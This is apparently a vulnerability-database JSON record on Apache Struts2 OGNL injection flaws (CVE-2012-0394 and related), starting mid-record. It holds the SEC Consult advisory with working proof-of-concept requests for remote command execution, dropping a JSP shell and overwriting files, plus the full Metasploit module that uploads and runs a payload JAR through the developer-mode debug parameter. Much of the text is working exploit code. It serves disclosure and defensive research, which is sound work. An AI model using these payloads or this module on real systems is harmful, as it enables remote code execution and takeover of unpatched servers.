Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\r\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\r\n vprint_line(res.body.to_s)\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\r\n\r\n upload_jar\r\n execute_jar\r\n end\r\n\r\n def upload_jar\r\n append = 'false'\r\n jar = payload.encoded_jar.pack\r\n chunk_length = 384 # 512 bytes when base64 encoded\r\n\r\n while(jar.length > chunk_length)\r\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\r\n jar = jar[chunk_length, jar.length - chunk_length]\r\n append='true'\r\n end\r\n java_upload_part(jar, @payload_jar, append)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_jar\r\n cmd = \"\"\r\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n # create classloader\r\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\r\n # load class\r\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n # invoke main method\r\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_command(cmd)\r\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\r\n injection.gsub!(/CMD/, cmd)\r\n\r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'method' => 'GET',\r\n 'vars_get' =>\r\n {\r\n 'debug' => 'command',\r\n 'expression' => injection\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31434/"}, {"lastseen": "2016-02-02T09:32:08", "bulletinFamily": "exploit", "description": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities. CVE-2012-0391,CVE-2012-0392,CVE-2012-0393,CVE-2012-0394. Webapps exploits for multiple platform", "modified": "2012-01-06T00:00:00", "published": "2012-01-06T00:00:00", "id": "EDB-ID:18329", "href": "https://www.exploit-db.com/exploits/18329/", "type": "exploitdb", "title": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities", "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20120104-0 >\r\n=======================================================================\r\n title: Multiple critical vulnerabilities in Apache Struts2\r\n product: Apache Struts2\r\n * OpenSymphony XWork\r\n * OpenSymphony OGNL\r\n vulnerable version: 2.3.1 and below\r\n fixed version: 2.3.1.1\r\n impact: critical\r\n homepage: http://struts.apache.org/\r\n found: 2011-11-18\r\n by: Johannes Dahse, Andreas Nusser\r\n SEC Consult Vulnerability Lab \r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\nApache Struts2 is a web framework for creating Java web applications. It is\r\nusing the OpenSymphony XWork and OGNL libraries. By default, XWork's\r\nParametersInterceptor treats parameter names provided to actions as OGNL\r\nexpressions. A OGNL (Object Graph Navigation Language) expression is a limited\r\nlanguage similar to Java that is tokenized and parsed by the OGNL parser which\r\ninvokes appropiate Java methods. This allows e.g. convenient access to\r\nproperties that have a getter/setter method implemented. By providing a\r\nparameter like \"product.id=1\" the OGNL parser will call the appropiate setter\r\ngetProduct().setId(1) in the current action context. OGNL is also able to call\r\narbitrary methods, constructors and access context variables. For more details\r\nplease refer to http://commons.apache.org/ognl/language-guide.html.\r\n\r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\nTo prevent attackers calling arbitrary methods within parameters the flag\r\n\"xwork.MethodAccessor.denyMethodExecution\" is set to \"true\" and the\r\nSecurityMemberAccess field \"allowStaticMethodAccess\" is set to \"false\" by\r\ndefault. Also, to prevent access to context variables an improved character\r\nwhitelist for paramteter names is applied in XWork's ParametersInterceptor since\r\nStruts 2.2.1.1:\r\n\r\nacceptedParamNames = \"[a-zA-Z0-9\\\\.\\\\]\\\\[\\\\(\\\\)_'\\\\s]+\";\r\n\r\nUnder certain circumstances these restrictions can be bypassed to execute\r\nmalicious Java code.\r\n\r\n1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)\r\n\r\nWhen an exception occurs while applying parameter values to properties the\r\nvalue is evaluated as OGNL expression. For example this occurs when setting a\r\nstring value to a property with type integer. Since the values are not\r\nfiltered an attacker can abuse the power of the OGNL language to execute\r\narbitrary Java code leading to remote command execution. This issue has been\r\nreported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in\r\nStruts 2.2.3.1. However the ability to execute arbitrary Java code has been\r\noverlooked.\r\n\r\n2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)\r\n\r\nThe character whitelist for parameter names is not applied to Struts\r\nCookieInterceptor. When Struts is configured to handle cookie names, an\r\nattacker can execute arbitrary system commands with static method access to\r\nJava functions. Therefore the flag \"allowStaticMethodAccess\" can be set to\r\ntrue within the request.\r\n\r\n3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)\r\n\r\nAccessing the flag \"allowStaticMethodAccess\" within parameters is prohibited\r\nsince Struts 2.2.3.1. An attacker can still access public constructors with\r\nonly one parameter of type String to create new Java objects and access their\r\nsetters with only one parameter of type String. This can be abused for example\r\nto create and overwrite arbitrary files. To inject forbidden characters to the\r\nfilename an uninitialized string property can be used.\r\n\r\n4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)\r\n\r\nWhile not being a security vulnerability itself, please note that applications\r\nrunning in developer mode and using Struts DebuggingInterceptor are prone to\r\nremote command execution as well. While applications should never run in\r\ndeveloper mode during production, developers should be aware that doing so not\r\nonly has performance issues (as documented) but also a critical security\r\nimpact.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n\r\n1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)\r\n\r\nGiven Test.java has an property \"id\" of type Integer or Long and appropriate\r\ngetter and setter methods:\r\n\tlong id;\r\n\t\r\nGiven test.jsp with result name=input is configured for action \"Test\":\r\nstruts.xml:\r\n\t<action name=\"Test\" class=\"example.Test\">\r\n\t\t<result name=\"input\">test.jsp</result>\r\n\t</action>\t\r\n\r\nThe following request will trigger an exception, the value will be evaluated\r\nas OGNL expression and arbitrary Java code can be executed:\r\n\r\n\t/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter(\"C:/wwwroot/sec-consult.jsp\")).append(\"jsp+shell\").close())%2b'\r\n\t\r\nAn attacker can\talso overwrite flags that will allow direct OS command execution:\r\n\t/Test.action?id='%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'\r\n\r\nIf test.jsp displays the property \"id\" the result of the Java code evaluation\r\ncan be accessed:\r\n\t<%@ taglib prefix=\"s\" uri=\"/struts-tags\" %>\r\n\t<s:property value=\"id\" />\t\t\r\n\t\r\n2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)\r\n\r\nGiven struts.xml is configured to handle all cookie names (independent of\r\nlimited cookie values):\r\n\t<action name=\"Test\" class=\"example.Test\">\r\n\t\t<interceptor-ref name=\"cookie\">\r\n\t\t\t<param name=\"cookiesName\">*</param>\r\n\t\t\t<param name=\"cookiesValue\">1,2</param>\r\n\t\t</interceptor-ref>\r\n\t\t<result ...>\r\n\t</action>\r\n\r\nThe following HTTP header will execute an OS command when sent to Test.action:\r\n\tCookie: (#_memberAccess[\"allowStaticMethodAccess\"]\\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1\r\n\r\n3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)\r\n\r\nGiven Test.java has an uninitialized property \"name\" of type String:\r\n\tString name; // +getter+setter\r\n\r\nThe following request will create/overwrite the file \"C:/sec-consult.txt\"\r\n(empty file):\r\n\t/Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1\r\n\t\r\nThe existence of the property 'x' used in these examples is of no importance.\r\n\r\n4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)\r\n\r\nGiven struts.xml is configured to run in developer mode and to use the\r\ndebugging interceptor:\r\n\t<constant name=\"struts.devMode\" value=\"true\" />\r\n\t<action name=\"Test\" class=\"example.Test\">\r\n\t\t<interceptor-ref name=\"debugging\" />\r\n\t\t<result ...>\r\n\t</action>\r\n\t\r\nThe following request will execute arbitrary OGNL expressions leading to remote command execution:\r\n\t/Test.action?debug=command&expression=%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc')\r\n\t\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nAll products using Struts2 are affected by at least one critical vulnerability\r\nlisted above!\r\n\r\nProof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts\r\n2.2.1.1\r\n\r\nProof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010\r\nand Struts 2.2.1.1, 2.2.3.1 and 2.3.1\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2011-12-14: Contacting vendor through security at struts dot apache dot org\r\n2011-12-14: Vendor reply, sending advisory draft\r\n2011-12-14: Vendor released Apache Struts 2.3.1 in parallel\r\n2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted\r\n2011-12-16: Vendor reply, discussing workaround\r\n2011-12-20: Discussing release of fixed version\r\n2011-12-21: Providing additional information\r\n2012-01-03: Vendor informs that update is ready\r\n2012-01-03: Patch (2.3.1.1) is available\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Struts 2.3.1.1\r\n\r\n\r\nWorkaround:\r\n-----------\r\nUpdate to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the\r\nParameters- and CookieInterceptor:\r\n\r\nacceptedParamNames = \"[a-zA-Z0-9\\\\.\\\\]\\\\[_']+\";\r\n\r\nDon't run your applications in developer mode.\r\n\r\n\r\nAdvisory URL:\r\n-------------\r\nhttps://www.sec-consult.com/en/advisories.html\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Unternehmensberatung GmbH\r\n\r\nOffice Vienna\r\nMooslackengasse 17\r\nA-1190 Vienna\r\nAustria\r\n\r\nTel.: +43 / 1 / 890 30 43 - 0\r\nFax.: +43 / 1 / 890 30 43 - 25\r\nMail: research at sec-consult dot com\r\nhttps://www.sec-consult.com\r\n\r\nEOF J. Dahse, A. Nusser / 2012\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18329/"}], "metasploit": [{"lastseen": "2019-04-05T16:31:28", "bulletinFamily": "exploit", "description": "This module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This module has been tested successfully on Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "modified": "2017-07-24T13:26:21", "published": "2014-01-26T00:17:01", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEV_MODE", "href": "", "type": "metasploit", "title": "Apache Struts 2 Developer Mode OGNL Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Developer Mode OGNL Execution',\n 'Description' => %q{\n This module exploits a remote command execution vulnerability in Apache\n Struts 2. The problem exists on applications running in developer mode,\n where the DebuggingInterceptor allows evaluation and execution of OGNL\n expressions, which allows remote attackers to execute arbitrary Java\n code. This module has been tested successfully on Struts 2.3.16, Tomcat\n 7 and Ubuntu 10.04.\n },\n 'Author' =>\n [\n 'Johannes Dahse', # Vulnerability discovery and PoC\n 'Andreas Nusser', # Vulnerability discovery and PoC\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-0394'],\n [ 'OSVDB', '78276'],\n [ 'EDB', '18329'],\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ]\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'Struts 2', { } ]\n ],\n 'DisclosureDate' => 'Jan 06 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\n ])\n end\n\n def check\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\n addend_one = rand_text_numeric(rand(3) + 1).to_i\n addend_two = rand_text_numeric(rand(3) + 1).to_i\n sum = addend_one + addend_two\n\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\n\n if res and res.code == 200 and res.body.to_i == sum\n return Exploit::CheckCode::Vulnerable\n end\n\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\n vprint_line(res.body.to_s)\n return Exploit::CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def exploit\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\n\n upload_jar\n execute_jar\n end\n\n def upload_jar\n append = 'false'\n jar = payload.encoded_jar.pack\n chunk_length = 384 # 512 bytes when base64 encoded\n\n while(jar.length > chunk_length)\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\n jar = jar[chunk_length, jar.length - chunk_length]\n append='true'\n end\n java_upload_part(jar, @payload_jar, append)\n end\n\n def java_upload_part(part, filename, append = 'false')\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\n cmd << \"#f.close()\"\n execute_command(cmd)\n end\n\n def execute_jar\n cmd = \"\"\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\n # create classloader\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\n # load class\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\n # invoke main method\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\n execute_command(cmd)\n end\n\n def execute_command(cmd)\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\n injection.gsub!(/CMD/, cmd)\n\n vprint_status(\"Attempting to execute: #{cmd}\")\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'GET',\n 'vars_get' =>\n {\n 'debug' => 'command',\n 'expression' => injection\n }\n })\n\n return res\n end\n\n\nend\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_dev_mode.rb"}], "canvas": [{"lastseen": "2016-09-25T14:12:35", "bulletinFamily": "exploit", "description": "**Name**| strutsCodeInjection \n---|--- \n**CVE**| CVE-2012-0394 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Struts Code Injector \n**Notes**| CVE Name: CVE-2012-0394 \nVENDOR: Apache \nNotes: \nCVE-2012-0394 \n\\- Struts <= 2.2.1.1 (ExceptionDelegator) \n \nWhen an exception occurs while applying parameter values to properties, the \nvalue is evaluated as OGNL expression which can be abused to accomplish Java code execution. \n \n\\- Struts <= 2.3.1 (CookieInterceptor) \n \nAgain an OGNL expression can be abused to accomplish arbitrary Java code execution \nby means of a crafted cookie. \n \nCVE-2010-1870 \n\\- Struts <= 2.2.0 (Xworks filter bypass) \nUnicode characters can be used to bypass character restrictions on OGNL expressions. \n \n \nRepeatability: Infinite \nReferences: \nCVE-2012-0394 \nhttp://struts.apache.org/2.x/docs/s2-008.html \nhttps://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt \n \nCVE-2010-1870 \nhttp://seclists.org/fulldisclosure/2010/Jul/183 \nhttp://struts.apache.org/2.2.1/docs/s2-005.html \n \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0394 \nCompatibility: \nStruts <= 2.2.1.1 (ExceptionDelegator) \nStruts <= 2.3.1 (CookieInterceptor) \nStruts <= 2.2.0 (XworksFilterBypass) \n \n\n", "modified": "2012-01-08T10:55:01", "published": "2012-01-08T10:55:01", "id": "STRUTSCODEINJECTION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/strutsCodeInjection", "type": "canvas", "title": "Immunity Canvas: STRUTSCODEINJECTION", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
